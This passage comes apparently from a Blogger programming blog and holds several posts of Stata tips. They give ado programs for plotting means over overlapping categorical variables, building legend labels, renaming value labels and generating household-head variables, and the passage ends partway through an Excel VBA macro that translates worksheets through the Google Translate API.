b) The groups defined by the categorical variable will be plotted the in the order that you specify them. So in the fourth graph above, the order is: current policy, alternative a, alternative b, since that is what is given in the option <span style="font-family: "Courier New",Courier,monospace;">catvarlist</span> below: <span style="font-family: "Courier New",Courier,monospace;">catvarlist("currentpolicy alternative_a alternative_b")</span><br />
<br />
c) You need to specify new value labels with the same numbering as the original value labels for the categorical variables. This is necessary for the plot to turn out nice (the spacing gets mucked up if I don't force this). You can do this in the <span style="font-family: "Courier New",Courier,monospace;">v() </span>option below. So the original value labels could be:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">current policy: 0 "non-exempt" 1 "exempt"</span><br />
<span style="font-family: "Courier New",Courier,monospace;">alternative a: 0 "does not receive" 1 "receives"</span><br />
<span style="font-family: "Courier New",Courier,monospace;">alternative b: 0 "Ineligible" 1 "eligible"</span><br />
<br />
You might want to relabel this using the <span style="font-family: "Courier New",Courier,monospace;">v()</span> option as follows:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">v(0 "non-beneficiary" 1 "beneficiary")</span><br />
<br />
To generate the fourth graph:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. overlappingcatgraphmean pccd using "$WHO_KG_reports/eraseme.dta", gc(graph bar (asis)) catvarlist("currentpolicy alternative_a alternative_b") v(0 "Non-beneficiary" 1 "Beneficiary") over2options(lab(angle(0) labs(vsmall))) replace go(note(`"Source: Some data source "') asy asc title("Average consumption of groups within population") subtitle("Simulation of policy options") ytitle("Per capita HH consumption (LCU)", margin(medium)) legend(size(small)) blabel(total, format(%9.0fc))) </span><br />
<br />
To generate the first three graphs:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. graph bar pccd [aw=expfact], over(currentpolicy) asy title("Mean annual consumption comparison") subtitle("Current Policy") ytitle("Consumption") note("Source: some data source") blabel(total, format(%9.0fc))</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. graph bar pccd [aw=expfact], over(alternative_a) asy title("Mean annual consumption comparison") subtitle("Alternative A Policy") ytitle("Consumption") note("Source: some data source") blabel(total, format(%9.0fc))</span><br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">. graph bar pccd [aw=expfact], over(alternative_b) asy title("Mean annual consumption comparison") subtitle("Alternative B Policy") ytitle("Consumption") note("Source: some data source") blabel(total, format(%9.0fc))</span><br />
<br />
The program:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define overlappingcatgraphmean<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com). 27 Nov 2012<br /> // I want to plot the mean of a variable over categorical values on the same plot. Of course, these categorical variables will not be mutually exclusive between them (though the are within them)<br /> // "using" should specify a .dta file - this program will save a dataset<br /> // doesn't take weights - uses svy mean to calculate the mean<br /> //<br /> // You call it like this:<br /> //<br /> // overlappingcatgraphmean varname using "filename.dta", gc(graph bar (asis)) go(over(catvariablelabel, [over_subopts]) over(catvariablelevel, [over_subopts]) asc title("My Title") ...) catvarlist(categoricalvar1 categoricalvar2) replace<br /> // <br /> // Note that: <br /> // 1. 'catvariablelabel', 'catvariablelevel_n' 'catvariablelevel' must be entered exactly as is (without the quotes) - these are names of variables that the program creates<br /> // 2. the order in which you enter the over() options is up to you.<br /> // <br /> // UPDATE 12-07-2012: Best way is to call it with a long dataset like this: graph bar v, over(eligible) over(avg). Also note that I haven't tested whether this works with "if"<br /><br /> syntax varname using/ [if] [in], GCmd(string) GOptions(string asis) CATvarlist(varlist) Valuelabelsforlevels(string asis) [replace over1options(string asis) over2options(string asis) ]<br /> version 9.1<br /> marksample touse<br /> tempname tempmat<br /> tempname variablelabel<br /> local `variablelabel' : variable label `varlist' <br /> <br /> // foreach category, find the mean<br /> foreach catvar of local catvarlist {<br /> tempfile tf_`catvar'<br /> <br /> // this is a pain: get the name of the variable's value label<br /> tempname tn_`catvarvaluelabel' <br /> local `tn_`catvarvaluelabel'' : value label `catvar'<br /> label save ``tn_`catvarvaluelabel''' using `"`tf_`catvar''"', replace<br /> <br /> // UPDATE: None of this is necessary. The user will pass a list of value labels, separated by spaces, and these will be assumed to be the same for all the categorical variables specified<br /> // e.g. user can pass v(0 "Qualifies" 1 "Does not Qualify"), where the categorical variables and corresponding value lables are:<br /> // exempt : 0 "Exempt" 1 "Non-exempt"<br /> // PMT : 0 "Eligible" 1 "Non-eligible"<br /> // MBPF : 0 "Receives" 1 "Does not receive"<br /><br /> di "cat = `catvar'"<br /> tempname catvarlabel_`catvar'<br /> local `catvarlabel_`catvar'': variable label `catvar'<br /> tempname levels_`catvar'<br /> levelsof `catvar', local(`levels_`catvar'')<br /> foreach level of local `levels_`catvar'' {<br /> svy: mean `varlist' if `catvar' == `level' & `touse'<br /> matrix `tempmat' = r(table)<br /> tempname mean_`catvar'_`level'<br /> local `mean_`catvar'_`level'' = `tempmat'[1,1]<br /> tempname vl`catvar'_`level'<br /> local `vl`catvar'_`level'' : label (`catvar') `level' <br /> // di "Mean of var: ``mean_`catvar'_`level'''"<br /> }<br /> }<br /><br /> tempname valueslabels<br /> label define `valueslabels' `valuelabelsforlevels'<br /> tempfile tf_valuelabelsforlevels<br /> label save `valueslabels' using `"`tf_valuelabelsforlevels'"', replace<br /> <br /> // I'll now make a dataset out of this with the following variables: mean of the variable; category name; category level<br /> // The latter two will be numeric, categorical variables with variable labels attached.<br /> preserve<br /> clear<br /> do `"`tf_valuelabelsforlevels'"'<br /> gen meanofvariable = .<br /> label var meanofvariable `"``variablelabel''"'<br /> gen catvariablelabel = ""<br /> gen catvariablelevel = ""<br /> gen catvariablelevel_n = .<br /> gen sortorder = .<br /> <br /> // create the sort order - it will be the order in which the categorical variables were specified<br /> <br /> tempname count sortcount<br /> local `count' = 0<br /> local `sortcount' = 0<br /> foreach catvar of local catvarlist {<br /> // di "cat = `catvar'"<br /> local `sortcount' = ``sortcount'' + 1<br /> foreach level of local `levels_`catvar'' {<br /> local `count' = ``count'' + 1<br /> set obs ``count''<br /> replace meanofvariable = ``mean_`catvar'_`level''' in ``count''<br /> replace catvariablelabel = `"``catvarlabel_`catvar'''"' in ``count''<br /> replace catvariablelevel_n = `level' in ``count''<br /> replace catvariablelevel = `"``vl`catvar'_`level'''"' in ``count''<br /> replace sortorder = ``sortcount'' in ``count''<br /> <br /> // di "Mean of var: ``mean_`catvar'_`level'''"<br /> }<br /> }<br /> label values catvariablelevel_n `valueslabels'<br /> save `"`using'"', `replace'<br /> `gcmd' meanofvariable, over(catvariablelevel_n, sort(catvariablelevel_n) `over1options') over(catvariablelabel, sort(sortorder) `over2options') `goptions' <br /> restore<br /><br />end program<br /></span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-26133624566070816532012-11-27T02:10:00.003-08:002012-12-08T03:37:49.965-08:00Stata tip: fixing the legend on bar graphs to display variable labels instead of variable names<div dir="ltr" style="text-align: left;" trbidi="on">
Check out the legends on these two graphs (the first one is the problem legend, the second one is the better legend):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDoR1dSGBOBOI8nvdf0yCaEdC-ALH3WTHypgl7L2j53Ofn4tcqWGyjf-QVBAK5FhLm4fngVDm5gZJ_JUzz-LtAwMNBHrEms4BNYH1T9nuei4aEPWtAZOXmUatCZQnCbiMa4GlaHJ1LbBw/s1600/Graph_share_reporting_appliedmedassistance_hospitalized_exempt_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDoR1dSGBOBOI8nvdf0yCaEdC-ALH3WTHypgl7L2j53Ofn4tcqWGyjf-QVBAK5FhLm4fngVDm5gZJ_JUzz-LtAwMNBHrEms4BNYH1T9nuei4aEPWtAZOXmUatCZQnCbiMa4GlaHJ1LbBw/s640/Graph_share_reporting_appliedmedassistance_hospitalized_exempt_2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6pbs8qh51rm_F9lHSk52zrFwZ3IHBqS-H7d3P3HHRCsIHj3-USkLqhs6t2EQCmXFMbVBUrDsuKbDj6kss9YbPp6JCJmIdjgE1P79_Zb6kQC3Cy16kx4wY2a4p41MmkEZo_6MOmSYgFuI/s1600/Graph_share_reporting_appliedmedassistance_hospitalized_exempt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6pbs8qh51rm_F9lHSk52zrFwZ3IHBqS-H7d3P3HHRCsIHj3-USkLqhs6t2EQCmXFMbVBUrDsuKbDj6kss9YbPp6JCJmIdjgE1P79_Zb6kQC3Cy16kx4wY2a4p41MmkEZo_6MOmSYgFuI/s640/Graph_share_reporting_appliedmedassistance_hospitalized_exempt.png" width="640" /></a></div>
<br />
For the first one, I used the command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">. graph bar (mean) appliedmed hospitalized [aw=expfact], over(exempt) ...</span><br />
<br />
and in the legend, it used "mean of [variable name]" instead of using the variable label. If you use the option <span style="font-family: "Courier New",Courier,monospace;">nolabel </span>after the <span style="font-family: "Courier New",Courier,monospace;">graph bar</span> command, you would just get "[variable name]" in the legend. How do you get stata to use the variable labels in the legend instead of the variable names, like in the second graph above? (note that, in the second graph, my program makes the variable labels go over two lines when they are long, and makes the line break at a space, not in the middle of a word). Use the following code:<br />
<br />
Usage:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">/ local vlist appliedmed hospitalized<br />. makelegendlabelsfromvarlabels `vlist', local(relabellegend) c(30)<br />. graph bar (mean) `vlist' [aw=expfact], over(exempt) title(`"Share reporting applied for medical assistance in the past 30 days"') ytitle("Fraction of group", margin(medium)) blabel(total, format(%9.2fc)) subtitle("Average for each group") legend(size(vsmall) `relabellegend') </span><br />
<br />
Where the program <span style="font-family: "Courier New",Courier,monospace;">makelegendlabelsfromvarlabels </span>is defined as below. In the above, the option c(30) tells stata that the first line should have only 30 characters, and that the rest of the value label should be placed on the line below.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define makelegendlabelsfromvarlabels<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com). 25 Nov 2012<br /> //<br /> <br /> // Wrote it to fix an annoyance with graph bar. I want graph bar to use variable labels, not variable names, in the legend, but it won't do this if I am using a "(stat)" rather than "(asis)"<br /> syntax varlist, local(name local) [c(integer 30)]<br /> version 9.1<br /> <br /> // local charlength = 30<br /> <br /> tempname count<br /> local `count' = 0<br /> tempname labeloptions<br /> tempname variablelabel<br /> foreach var of local varlist {<br /> local `count' = ``count'' + 1<br /> local `variablelabel' : variable label `var'<br /> <br /> // It would be great to break this up at a word boundary if the length is > 34 characters<br /> if (length(`"``variablelabel''"') > `c') {<br /> tempname variablelabel_part1<br /> tempname variablelabel_part2<br /> tempname variablelabel_tochange<br /> tempname positionofspace<br /> tempname positionofspace_prev<br /> tempname exitwhileloop<br /> local `exitwhileloop' = 0<br /> local `positionofspace' = 0<br /> local `variablelabel_tochange' `"``variablelabel''"'<br /> while (``exitwhileloop'' == 0) {<br /> <br /> local `positionofspace' = strpos(`"``variablelabel_tochange''"', " ")<br /> if (``positionofspace'' >= `c' | ``positionofspace''==0) {<br /> local `exitwhileloop' = 1<br /> } <br /> else {<br /> local `positionofspace_prev' = ``positionofspace''<br /> local `variablelabel_tochange' = subinstr(`"``variablelabel_tochange''"'," ",".",1)<br /> }<br /> <br /> } <br /> <br /> local `variablelabel_part1' = substr(`"``variablelabel''"', 1, ``positionofspace_prev'')<br /> local `variablelabel_part2' = substr(`"``variablelabel''"', ``positionofspace_prev'' + 1, . )<br /> local `labeloptions' `"``labeloptions'' label(``count'' `"``variablelabel_part1''"' `"``variablelabel_part2''"') "'<br /> }<br /> else {<br /> local `labeloptions' `"``labeloptions'' label(``count'' `"``variablelabel''"') "'<br /> }<br /> }<br /> <br /> // di `"labeloptions: ``labeloptions''"'<br /> // need to return this in a local macro<br /> c_local `local' `"``labeloptions''"'<br /> <br /><br />end program</span><br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com4tag:blogger.com,1999:blog-2722671667390463266.post-19658475272065029422012-11-26T10:03:00.000-08:002012-12-03T00:17:07.577-08:00Stata tip: Rename the value label associated with a variable, when renaming said variable<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you have a datset with the variable <span style="font-family: "Courier New",Courier,monospace;">a9</span>, and the value label associated with this is <span style="font-family: "Courier New",Courier,monospace;">a9</span> (or <span style="font-family: "Courier New",Courier,monospace;">gobledygook</span>, or whatever). You may want to change this variable name to something more telling, like maritalstatus. If you use<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">rename a9 maritalstatus</span><br />
<br />
The value label remains a9. The following ado file will allow you to change both the variable name and the name of the variable label at the same time:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">renamevarandvarlabel a9 maritalstatus</span><br />
<br />
now both the variable name and the variable label are <span style="font-family: "Courier New",Courier,monospace;">maritalstatus</span>. Note that the original variable label can be named anything. For example, if the original variable label was <span style="font-family: "Courier New",Courier,monospace;">gobledygook</span>, it would still be changed to <span style="font-family: "Courier New",Courier,monospace;">maritalstatus</span>.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">program define renamevarandvaluelabel<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com). 25 Nov 2012<br /><br /> // This program renames the variable and the value label. Usage:<br /> // renamevarandvaluelabel originalvarname newvarname<br /> // What it does:<br /> // rename originalvarname newvarname<br /> // and it changes the name of the value label of originalvarname to newvarname. <br /> // Just make sure that if there is already a value label named newvarname, you're ok with loosing it.<br /><br /> // syntax anything(id="variable and values" name=arguments)<br /> syntax anything(id="original and new label name" name=labelnames)<br /> version 9.1<br /> <br /> // steps:<br /> // 1. drop the label with the new label name, if it exists<br /> // 2. create the new label from the old label<br /> // 3. apply this new label to variable <br /> <br /> // di "labelnames = `labelnames'"<br /> <br /> foreach item of local labelnames {<br /> // di `"item = `item'"'<br /> }<br /> <br /> tempname originallabelname<br /> tempname originalvarname <br /> local `originalvarname' : word 1 of `labelnames'<br /> tempname newvarandlabelname <br /> local `newvarandlabelname' : word 2 of `labelnames'<br /> <br /> // Step 1. drop the label with the new label name, if it exists. Wait, if it exists... what do we do? Quit the program<br /> cap label list ``newvarandlabelname''<br /> if (_rc == 0) {<br /> di "That label (``newvarandlabelname'') already exists. You can use the command "renamevaluelabel [oldlabelname] [newlabelname] written by Shafique Jamal (shafique.jamal@gmail.com) to change that value label name." Exiting"<br /> exit<br /> }<br /> <br /> // Step 2. create the new label from the old label. First need to get the name of the label value of the original variable name. Do this only if there is a value label attached<br /> local `originallabelname' : value label ``originalvarname''<br /> if ("``originallabelname''"~="" & "``originallabelname''"~=" ") {<br /> <br /> di "There is an existing label"<br /> label copy ``originallabelname'' ``newvarandlabelname''<br /> <br /> // Step 3. rename the variable, then attached the new variable label<br /> rename ``originalvarname'' ``newvarandlabelname''<br /> label values ``newvarandlabelname'' ``newvarandlabelname''<br /> }<br /> else { // Just rename the variable, forget about the value label, if there is no original value label <br /> <br /> di "No existing label"<br /> rename ``originalvarname'' ``newvarandlabelname''<br /> }<br /> <br /> <br />end</span><br />
<br />
<br />
</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-37766854852549449112012-11-26T09:56:00.003-08:002012-12-03T00:17:22.632-08:00Stata tip: Easy and short way to generate household head variables for individual-level datasets<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you have an individual-level dataset (so you have a dataset with data on multiple members in the household), and you want to generate an variable that says something about the household head (e.g. household head is male, or is unemployed, etc.). This program will allow you to do so with just one command:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">program define genhhhcharacteristics<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com).<br /> // For an individual level dataset (includes multiple household members, not just the household head), generates a variable indicating a characteristic of the household head<br /> // e.g. suppose you want to generate a new variable (hhh_male) indicating the gender of the household head, and the variable identifying the household head is "reltohead", with 1 being the head,<br /> // and you want to do it by hhid of course. You would use the following command:<br /> // <br /> // genhhhcharacteristics male, b(hhid) gen(hhh_male) h(reltohead) id(1)<br /> //<br /> // The above would be the equivalent of doing the following:<br /> // gen hhh_male_interm = 1 male if reltohead == 1<br /> // bys hhid: egen hhh_male = max(hhh_male_interm)<br /> // drop hhh_male_interm<br /> // And then copying the value label and a modified variable label over to the new household head variable <br /> // <br /><br /> syntax varname, Byvariables(varlist) GENerate(name) Headvariable(varname) [IDofhead(integer 1) ] <br /> version 9.1<br /><br /> tempvar intermediaryvariable<br /> gen `intermediaryvariable' = `varlist' if `headvariable' == `idofhead'<br /> bys `byvariables': egen `generate' = max(`intermediaryvariable')<br /> <br /> // Now copy the value label over, if there is one<br /> tempname valuelabel<br /> local `valuelabel' : value label `varlist'<br /> if ("``valuelabel''"~="" & "``valuelabel''"~=" ") {<br /> <br /> // di "There is an existing label"<br /> label values `generate' ``valuelabel''<br /> }<br /> <br /> // Copy over also the variable label<br /> tempname variablelabel<br /> local `variablelabel' : variable label `varlist'<br /> label var `generate' `"``variablelabel'' (For `headvariable' == `idofhead', by `byvariables')"'<br /> <br />end program</span><br />
<br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com1tag:blogger.com,1999:blog-2722671667390463266.post-67113232526019720002012-11-23T15:58:00.001-08:002012-12-07T11:24:07.695-08:00Stata tip: plotting the output of the tab function<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: inherit;">UPDATE2: I updated this to allow for "if" and "in" </span><br />
<br />
<span style="font-family: inherit;">UPDATE: I updated this to preserve the value labels. So var2 (the second variable in your variable list) must have a value label attached to it. </span><br />
<br />
<span style="font-family: inherit;">Suppose you want to plot the output of the two-way tab function? Here is a program that will do it (see below). It is actually a wrapper for the tabout command. Some notes about the options:</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">using: put here the name of the filename that you want to save the tabout data to, in tab separated format. The graphs that this command produces will save graphs using the same filename but with different extension.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">gc: this stands for graph command. You can use gc("graph bar"), gc("graph hbar")... and maybe others</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">go: this stands for graph options. These are the options that you would use for the graph command above (e.g. note, title, b1title, subtitle, etc)</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">ta: this stands for tabout options. These are the options you would use with the tabout command (e.g. c(), f(), etc.) </span><br />
<br />
Usage:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">taboutgraph var1 var2 [aw=weight] using "filename_to_savedatato.csv", gc("graph bar") ta(cells(col) f(2 2 2 2)) replace go( note("Source: XXX") b1title("Quintile") title(`"Composition of Population"') ytitle("Percent of population in the quntile"))</span><br />
<br />
Code<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">program define taboutgraph<br /><br /> // Written by Shafique Jamal (shafique.jamal@gmail.com)<br /> // This program requires that the second variable in varlist have a value label attached to it<br /> // It plots the column output of the tabout command<br /><br /> syntax varlist(min=2 max=2) [if] [in] using/ [aweight], GCmd(string) GOptions(string asis) TAboutoptions(string asis) [replace overcategorysuboptions(string asis) overxsuboptions(string asis)]<br /> version 9.1<br /> marksample touse<br /> // di `"`0'"'<br /> cap drop _v*<br /> // cap ssc install lstrfun<br /> <br /> // first generate the table<br /> tabout `varlist' [`weight'`exp'] if `touse' using `using', `replace' `taboutoptions'<br /> di `"tabout [`weight'`exp'] `varlist' if `touse' using `using', `replace'"'<br /> local number_of_rows = r(r)<br /> local number_of_columns = r(c)<br /> return list<br /> <br /> // get the filename<br /> di `"regexm:"'<br /> di regexm(`"`using'"',`"((.*)\.(.+))$"')<br /> if (regexm(`"`using'"',`"((.*)\.(.+))$"')) {<br /> local pathtofile_original = regexs(1)<br /> local pathtofile_withoutextension = regexs(2)<br /> local pathtofile_extension = regexs(3)<br /> }<br /> di `"pathtofile_original:`pathtofile_original'"'<br /> di `"pathtofile_withoutextension:`pathtofile_withoutextension'"'<br /> di `"pathtofile_extension:`pathtofile_extension'"'<br /> // open the file and process it.<br /> <br /> local count = 0<br /> tempname fhr<br /> tempname fhw<br /> tempfile tf<br /> file open `fhr' using `"`pathtofile_original'"', r<br /> <br /> // ---------------------------<br /> // file open `fhw' using `"$WHO_KG_reports/tempfile.csv"', t write all replace<br /> file open `fhw' using `"`tf'"', t write all replace<br /> <br /> local count = `count' + 1<br /><br /> // First line is variable label.<br /> file read `fhr' line<br /> return list<br /> local count = 1<br /> while r(eof)==0 {<br /> local count = `count' + 1<br /> // di `"count = `count'"'<br /> file read `fhr' line<br /> <br /> if (`count'~=3) { // This line is units - we can throw this away<br /> file write `fhw' `"`line'"' _n<br /> // di `"`line'"'<br /> }<br /> }<br /> <br /> file close `fhr'<br /> file close `fhw'<br /> <br /> // We should save the value labels. Check to make sure that the label exists<br /> tempfile tfvaluelabels<br /> tempname nameofvaluelabel<br /> tempname variablenamewithlabel<br /> local `variablenamewithlabel' : word 2 of `varlist'<br /> local `nameofvaluelabel' : value label ``variablenamewithlabel''<br /> label save ``nameofvaluelabel'' using `"`tfvaluelabels'"', replace<br /> <br /> preserve<br /> qui insheet using `"`tf'"', t clear names<br /> <br /> // I want to restore the value levels and value labels<br /> do `"`tfvaluelabels'"'<br /> // ssc install labellist<br /> // levelsof ``nameofvaluelabel'', local(levels)<br /> labellist ``nameofvaluelabel''<br /> local levels = r(``nameofvaluelabel''_values)<br /> local labels = r(``nameofvaluelabel''_labels)<br /> <br /> save `"`pathtofile_withoutextension'_short.dta"', replace<br /><br /> drop total<br /> drop if _n == _N<br /> <br /> local count = 0<br /> local count_levels = 0<br /> foreach var of varlist * {<br /> local count = `count' + 1<br /> <br /> if (`count'==1) {<br /> qui rename `var' x<br /> }<br /> else {<br /> local count_levels = `count_levels' + 1<br /> local level : word `count_levels' of `levels'<br /> qui rename `var' _v`level'<br /> // qui rename `var' _v`count'<br /> local v`level'_labelforfilename = `"`var'"' // used for the filename for saving graphs of individual variables<br /> local v`level'_varlabel : variable label _v`level' // used for the subtitle in the plot of individual variables.<br /> }<br /> }<br /> <br /> // COME BACK TO THIS<br /> // graph each y var, then all y vars<br /> <br /> foreach level of local levels {<br /> `gcmd' (asis) _v`level', over(x, ) `goptions' subtitle(`"`v`level'_varlabel'"')<br /> graph export "`pathtofile_withoutextension'_`v`level'_labelforfilename'.pdf", replace<br /> }<br /> /*<br /> forv x = 2/`count' {<br /> `gcmd' (asis) _v`x', over(x) `goptions' subtitle(`"`v`x'_varlabel'"')<br /> // di `"subtitle: subtitle(`"`v`x'_varlabel'"'), `v`x'_varlabel', v`x'_varlabel"'<br /> graph export "`pathtofile_withoutextension'_`v`x'_labelforfilename'.pdf", replace<br /> }<br /> */<br /> <br /> // graph all yvars<br /> qui reshape long _v, i(x) j(category)<br /> // cap tostring category, replace<br /> label values category ``nameofvaluelabel''<br /><br /> /*<br /> forv x = 2/`count' {<br /> qui replace category = `"`v`x'_varlabel'"' if category == `"`x'"'<br /> }<br /> */<br /> `gcmd' (asis) _v, over(category, `overcategorysuboptions') over(x, `overxsuboptions') asyvars `goptions'<br /> graph export "`pathtofile_withoutextension'_allvars.pdf", replace<br /> save `"`pathtofile_withoutextension'_long.dta"', replace<br /> restore<br />end program</span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-41258773759233769962012-11-23T15:00:00.002-08:002012-11-26T19:32:40.205-08:00MS Excel VBA script to translate worksheets using the google translate API<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
UPDATE: I've made and Excel Add-In, that you can download <a href="https://docs.google.com/open?id=0BwOJxAq1e-5URUlQUWdKZ2dYNFE" target="_blank">here</a>. Add it in to your worksheet and type Control+Shift+T to start the macro. I'll try to make a youtube video to demonstrate.<br />
<br />
UPDATE #2: Here is a <a href="http://www.youtube.com/watch?v=ph6auAGXN-w&feature=plcp" target="_blank">YouTube video</a> to show how to download and install the add-in. <br />
<br />
A while ago I wrote some code in Perl to translate excel sheets using google translate while preserving the formatting. That way was long, unreliable, complicated, etc. Here is a better solution.<br />
<br />
Put the following MS Excel VBA macro code into your personal workbook, and create a shortcut to it (I use Ctrl+shift+t). It uses the google translate API. It will translate all non-empty, non-numeric cells in the active worksheet, placing the translation into a new worksheet, with the original formatting. It will place the original of numeric cells (not translated) into the new worksheet. The new worksheet will be the name of the old worksheet, with an underscore and the two letter language code appended onto it. If a worksheet with that name already exists, it will be deleted.<br />
<br />
You will have to specify the following in a dialog box that will pop up when you run the Macro (or just in the code - I don't know how to paste the code for the userform here):<br />
1. your google API key. The google translate API is not free, right now it is $20 per 1M characters<br />
2. two letter language code for the source language <br />
3. two letter language code for the destination language<br />
<br />
(for 2 and 3, you have to use the language codes that the google translate API supports. See https://developers.google.com/translate/) <br />
<br />
Maybe I'll modify this one day to use autodetect for the language, so that you can translate multiple languages on the same worksheet.<br />
<br />
Feedback is always appreciated. Good luck!<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">Sub TranslateWorsheet()<br /><br /> ' I got the URL encoding function here: http://stackoverflow.com/questions/218181/how-can-i-url-encode-a-string-in-excel-vba<br /> ' To run this script, you need to add "Microsoft Script Control" as reference (Tools -> References in the VB Editor)<br /><br /> ' Step 1: Create a new worksheet: existing worksheetname_2lettertargetlanguagecode<br /> ' Step 2: In the current sheet, loop through all non-empty cells <br /> ' a) send the REST request to API to translate the contents of the cell if it is non-numeric, otherwise paste the original cell contents<br /> ' b) put the translated contents in the corresponding cell of the new worksheet<br /> ' c) copy also the formatting of the cell<br /><br /> Dim destinationWorksheetName As String<br /> Dim sourceWorksheetName As String<br /> Dim cellContent As String<br /> Dim cellAddress As String<br /> Dim sourceWorksheet As Worksheet<br /> Dim destinationWorksheet As Worksheet<br /> <br /> Dim ScriptEngine As ScriptControl<br /> Set ScriptEngine = New ScriptControl<br /> ScriptEngine.Language = "JScript"<br /> ScriptEngine.AddCode "function encode(str) {return encodeURIComponent(str);}"<br /> <br /> ' use regualr expression to get the translation<br /> Dim RE As Object<br /> Set RE = CreateObject("VBScript.RegExp")<br /> RE.Pattern = "\[\s*{\s*""translatedText"": ""(.*)""\s}*"<br /> RE.IgnoreCase = False<br /> RE.Global = False<br /> RE.MultiLine = True<br /> Dim testResult As Boolean<br /> <br /> ' send the translation request<br /> Dim REMatches As Object<br /> Dim translateD As String<br /> Dim sourceString As String<br /> Dim K As String<br /> Dim URL As String<br /> Dim encodedSourceString As String<br /> Dim sourceLanguage As String<br /> Dim destinationLanguage As String<br /> Set sourceWorksheet = ActiveSheet<br /> sourceWorksheetName = ActiveSheet.Name<br /> <br /> ' sourceString = "Hello World"<br /> destinationLanguage = "EN"<br /> sourceLanguage = "RU"<br /> K = InputBox(prompt:="Please enter your Google Translate API key", Title:="Google Translate API Key Required: For more info, see https://developers.google.com/translate/v2/getting_started")<br /><br /> 'obTranslateOptions.Show<br /> 'sourceLanguage = obTranslateOptions.obSourceLanguage.Text<br /> 'destinationLanguage = obTranslateOptions.obDestinationLanguage.Text<br /> 'K = obTranslateOptions.obKey.Text<br /><br /> 'Debug.Print "K=" & K<br /> 'Debug.Print "sourceLanguage=" & sourceLanguage<br /> 'Debug.Print "destinationLanguage=" & destinationLanguage<br /> <br /> ' Unload obTranslateOptions<br /> <br /> ' If a worksheet of this name in this workbook already exist, then delete it<br /> destinationWorksheetName = sourceWorksheetName & "_" & destinationLanguage<br /> Application.DisplayAlerts = False<br /> On Error Resume Next<br /> Sheets(destinationWorksheetName).Delete<br /> Application.DisplayAlerts = True<br /> On Error GoTo 0<br /> <br /> ' Prepare to send the request<br /> Dim objHTTP As Variant<br /> Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")<br /> Dim responseT As String<br /> <br /> ' copy active worksheet, clear contents of the copy<br /> ActiveWorkbook.ActiveSheet.Copy after:=ActiveWorkbook.ActiveSheet<br /> ActiveSheet.Name = destinationWorksheetName<br /> ActiveSheet.Cells.ClearContents<br /> Set destinationWorksheet = ActiveSheet<br /> <br /> sourceWorksheet.Activate<br /> ' loop through all non-empty cells or all selected cells<br /> Dim cell As Range<br /> For Each cell In ActiveSheet.UsedRange.Cells<br /> <br /> 'Debug.Print cell.Address<br /> cellAddress = cell.Address<br /> sourceString = cell.Value<br /> 'Debug.Print "sourceString:" & sourceString<br /> <br /> ' do only for non-numeric cells<br /> If (IsNumeric(cell.Value) = False) Then<br /> <br /> ' encode the source text<br /> encodedSourceString = ScriptEngine.Run("encode", sourceString)<br /> ' prepare and send the request<br /> URL = "https://www.googleapis.com/language/translate/v2?key=" & K & "&source=" & sourceLanguage & "&target=" & destinationLanguage & "&q=" & encodedSourceString<br /> objHTTP.Open "GET", URL, False<br /> objHTTP.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"<br /> objHTTP.send ("")<br /> responseT = objHTTP.ResponseText<br /> ' Debug.Print "responseT:" & responseT<br /> <br /> ' pull the translation from the response to the request<br /> If (RE.Test(responseT) = True) Then<br /> 'Debug.Print "re.test is true"<br /> Set REMatches = RE.Execute(responseT)<br /> translateD = REMatches.Item(0).SubMatches.Item(0)<br /> 'Debug.Print "translateD:" & translateD<br /> 